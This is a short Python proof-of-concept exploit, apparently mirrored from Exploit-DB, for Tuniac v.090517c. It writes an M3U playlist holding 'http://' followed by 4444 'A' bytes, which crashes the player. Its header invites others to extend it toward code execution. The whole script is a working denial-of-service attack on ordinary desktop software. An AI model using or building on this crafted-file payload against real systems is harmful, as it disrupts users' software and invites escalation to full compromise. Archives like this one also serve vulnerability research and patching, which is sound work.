exploit-db-mirror/exploits/windows/dos/9364.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
638 B
Python
Executable file

#!/usr/bin/env python
##############################################################################################
#
# Tuniac v.090517c (.M3U) Crash PoC
# Found By: Dr_IDE
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download
# Notes: Not sure if code execution is possible though. Maybe someone else can finish it off.
#
##############################################################################################
# Play around here, anything seems to knock it out.
buffer = ("http://" + "\x41" * (4444));
f = open('Dr_IDE.M3U','w');
f.write(buffer);
f.close();
# milw0rm.com [2009-08-05]